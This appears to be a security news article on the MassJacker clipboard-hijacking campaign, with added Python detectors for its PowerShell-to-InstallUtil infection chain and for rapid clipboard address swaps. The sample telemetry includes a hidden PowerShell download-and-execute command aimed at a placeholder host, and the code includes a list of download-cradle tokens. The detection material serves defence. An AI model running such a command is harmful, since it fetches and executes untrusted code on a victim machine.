“Massive Crypto Heist: MassJacker Malware Deploys 778,000+ Wallets to Siphon Digital Assets”

# MassJacker: Massive Cryptocurrency Theft Operation Uncovered

A sophisticated clipboard hijacking campaign dubbed ‘MassJacker’ has been discovered using 778,531 attacker-controlled cryptocurrency wallet addresses to steal digital assets from victims’ computers. According to cybersecurity firm CyberArk, 423 of those wallets held funds at the time of analysis, about $95,300 in total, though historical transaction data suggests the amounts stolen over the campaign’s lifetime are much higher.

Researchers identified a central Solana wallet that appears to function as the operation’s main collection point, having received more than $300,000 in transactions to date. Evidence suggests MassJacker is run by a single threat group, since identical file names and encryption keys were used consistently throughout the campaign, though a malware-as-a-service model cannot be ruled out.

## How MassJacker Works

Unlike traditional cryptojacking that hijacks computing resources for mining, MassJacker employs clipboard hijacking malware that:

– Monitors the Windows clipboard for cryptocurrency wallet addresses
– Replaces legitimate addresses with attacker-controlled ones
– Redirects victim transactions to the attackers’ wallets

These “clippers” are particularly difficult to detect precisely because they do so little: their code footprint is small and their only observable action is reading and rewriting the clipboard.

## Technical Infrastructure

The malware distribution chain begins at pesktop[.]com, a site hosting pirated software. When users download software from this site, they unknowingly execute:

1. A CMD script that triggers PowerShell
2. PowerShell fetches an Amadey bot and two loader files
3. Multiple layers of packers decrypt and load subsequent components
4. The final MassJacker payload is injected into ‘InstallUtil.exe’, a legitimate Windows .NET Framework binary
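Detection logic for the chain listed above, as an added example (this is not CyberArk’s code and nothing here is taken from the MassJacker samples): it walks Sysmon-style process-creation records and flags the two stages that are hardest to make look benign, cmd.exe launching PowerShell with a download cradle, and InstallUtil.exe started with no assembly argument underneath that lineage. The telemetry is constructed inline; the download-cradle token list, the field names, and the heuristic that a bare InstallUtil.exe launch marks an injection target (legitimate use always passes an assembly path) are the example’s own assumptions, not the report’s.

```python
import re
from dataclasses import dataclass


@dataclass
class Proc:
    """One process-creation record (Sysmon event ID 1 style), trimmed to the fields the rules need."""
    pid: int
    ppid: int
    image: str
    cmdline: str

    @property
    def name(self) -> str:
        return self.image.rsplit("\\", 1)[-1].lower()


# Tokens typical of a PowerShell download cradle (assumed list, not taken from the campaign).
CRADLE = re.compile(
    r"(iwr|invoke-webrequest|downloadstring|downloadfile|net\.webclient|start-bitstransfer|curl\b)",
    re.IGNORECASE,
)


def has_args(cmdline: str) -> bool:
    """True if anything follows the executable on the command line (handles a quoted image path)."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        rest = s[end + 1:] if end != -1 else ""
    else:
        parts = s.split(None, 1)
        rest = parts[1] if len(parts) > 1 else ""
    return bool(rest.strip())


def lineage(proc: Proc, by_pid: dict) -> list:
    """Process names from proc up to the root, e.g. ['installutil.exe', 'powershell.exe', 'cmd.exe', ...]."""
    chain, seen = [], set()
    while proc is not None and proc.pid not in seen:
        seen.add(proc.pid)
        chain.append(proc.name)
        proc = by_pid.get(proc.ppid)
    return chain


def find_suspicious(procs: list) -> list:
    """Return (rule, pid) pairs for processes matching the chain's stages."""
    by_pid = {p.pid: p for p in procs}
    alerts = []
    for p in procs:
        parent = by_pid.get(p.ppid)
        # Stages 1-2: cmd.exe launching PowerShell that fetches something from the network.
        if (p.name == "powershell.exe" and parent is not None
                and parent.name == "cmd.exe" and CRADLE.search(p.cmdline)):
            alerts.append(("powershell_download_cradle_from_cmd", p.pid))
        # Stage 4: InstallUtil.exe normally receives an assembly path; a bare launch is the
        # injection-target pattern (heuristic). Escalate when cmd.exe and PowerShell are ancestors.
        if p.name == "installutil.exe" and not has_args(p.cmdline):
            chain = lineage(p, by_pid)
            if "powershell.exe" in chain and "cmd.exe" in chain:
                alerts.append(("installutil_no_args_under_cmd_powershell", p.pid))
            else:
                alerts.append(("installutil_no_args", p.pid))
    return alerts


# Constructed sample telemetry: one chain shaped like the article's description plus two benign look-alikes.
SAMPLE = [
    Proc(100, 1,   r"C:\Windows\explorer.exe", "explorer.exe"),
    Proc(200, 100, r"C:\Windows\System32\cmd.exe", r'cmd.exe /c "C:\Users\u\Downloads\setup\run.cmd"'),
    Proc(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "powershell.exe -w hidden -ep bypass -c \"iwr http://example.invalid/a.bin -OutFile a.bin; .\\a.bin\""),
    Proc(400, 300, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
         r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"'),   # bare launch
    Proc(500, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "powershell.exe -File C:\\scripts\\Get-Inventory.ps1"),                # admin script, not from cmd
    Proc(600, 100, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
         r"InstallUtil.exe C:\svc\MyService.exe"),                               # legitimate: has assembly arg
]

if __name__ == "__main__":
    for rule, pid in find_suspicious(SAMPLE):
        print(f"{rule}: pid {pid}")
```

Fed real Sysmon or EDR process events, the second rule is the higher-signal one: the parent of the injected InstallUtil.exe in a live infection may be a loader rather than PowerShell itself, which is why the check walks the whole ancestor chain instead of testing only the immediate parent.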

MassJacker matches clipboard contents against regular-expression patterns for cryptocurrency addresses and, on a hit, replaces the address with one drawn from an attacker-controlled, encrypted list.
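A clipboard-side detector for the behaviour described above, as an added example (not CyberArk’s code, and not MassJacker’s own regexes, which the article does not reproduce): it classifies clipboard strings by address type, using a Base58Check test to tell a Bitcoin legacy address from other base58 text, and flags the clipper signature, an address overwritten by a different address of the same type within seconds of the copy. The clipboard timeline, the address patterns and the 2-second window are the example’s assumptions.

```python
import hashlib
import re
from dataclasses import dataclass

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def b58check_valid(addr: str) -> bool:
    """True if addr is Base58Check: its last 4 bytes equal the first 4 bytes of
    SHA256(SHA256(payload)). Separates a real Bitcoin legacy address from other base58 text."""
    n = 0
    for ch in addr:
        idx = B58_ALPHABET.find(ch)
        if idx < 0:
            return False
        n = n * 58 + idx
    raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
    raw = b"\x00" * (len(addr) - len(addr.lstrip("1"))) + raw   # each leading '1' is a leading zero byte
    if len(raw) < 5:
        return False
    payload, checksum = raw[:-4], raw[-4:]
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4] == checksum


# Address shapes a clipper typically targets (assumed subset for the example).
_SHAPES = [
    ("eth",        re.compile(r"0x[0-9a-fA-F]{40}")),
    ("btc_bech32", re.compile(r"bc1[qpzry9x8gf2tvdw0s3jn54khce6mua7l]{39,59}")),
    ("base58",     re.compile(r"[1-9A-HJ-NP-Za-km-z]{26,44}")),
]


def classify(text: str):
    """Return the address type of a clipboard string, or None if it is not an address."""
    s = text.strip()
    for kind, pat in _SHAPES:
        if not pat.fullmatch(s):
            continue
        if kind != "base58":
            return kind
        # Bitcoin legacy ('1...' P2PKH / '3...' P2SH) carries a checksum; a 32-byte ed25519
        # key as used by Solana encodes to 32-44 base58 chars with no checksum at all.
        if s[0] in "13" and len(s) <= 35 and b58check_valid(s):
            return "btc_legacy"
        if len(s) >= 32:
            return "sol"
        return None
    return None


@dataclass
class ClipboardEvent:
    t: float        # seconds since the monitor started
    content: str


def detect_swaps(events, window: float = 2.0):
    """Flag the clipper signature: an address replaced by a *different* address of the same
    type within `window` seconds, with nothing else on the clipboard in between.
    Returns (kind, original, replacement, delay) tuples."""
    alerts = []
    for prev, cur in zip(events, events[1:]):
        a, b = prev.content.strip(), cur.content.strip()
        kind = classify(a)
        if kind is not None and classify(b) == kind and a != b and 0 <= cur.t - prev.t <= window:
            alerts.append((kind, a, b, cur.t - prev.t))
    return alerts


# Constructed clipboard timeline: two copies followed by a fast rewrite, plus benign activity.
ETH_USER, ETH_ATTACKER = "0x" + "a1" * 20, "0x" + "b2" * 20
SOL_USER, SOL_ATTACKER = "9" + "Qq" * 21 + "9", "9" + "Rr" * 21 + "9"   # 44-char base58 strings
SAMPLE_EVENTS = [
    ClipboardEvent(0.0, "invoice #4471 due friday"),
    ClipboardEvent(1.0, ETH_USER),
    ClipboardEvent(1.3, ETH_ATTACKER),                            # rewritten 300 ms after the copy
    ClipboardEvent(9.0, "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"),    # copied once, never changed
    ClipboardEvent(50.0, SOL_USER),
    ClipboardEvent(50.4, SOL_ATTACKER),
    ClipboardEvent(120.0, "bc1qw508d6qejxtdg4y5r3zarvary0c5xw7kv8f3t4"),
]

if __name__ == "__main__":
    for kind, a, b, dt in detect_swaps(SAMPLE_EVENTS):
        print(f"{kind}: {a} -> {b} after {dt:.2f}s")
```

On a live host the events would come from a clipboard watcher that polls or subscribes to clipboard updates; the point of the design is that the attacker’s replacement address is itself perfectly valid, so checksum or format validation alone never catches a clipper, only the change pattern (same type, different value, too fast for a human) does.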

CyberArk urges the cybersecurity community to investigate large-scale operations like MassJacker more thoroughly, as they may reveal valuable intelligence about threat actors despite appearing to cause relatively low financial damage.
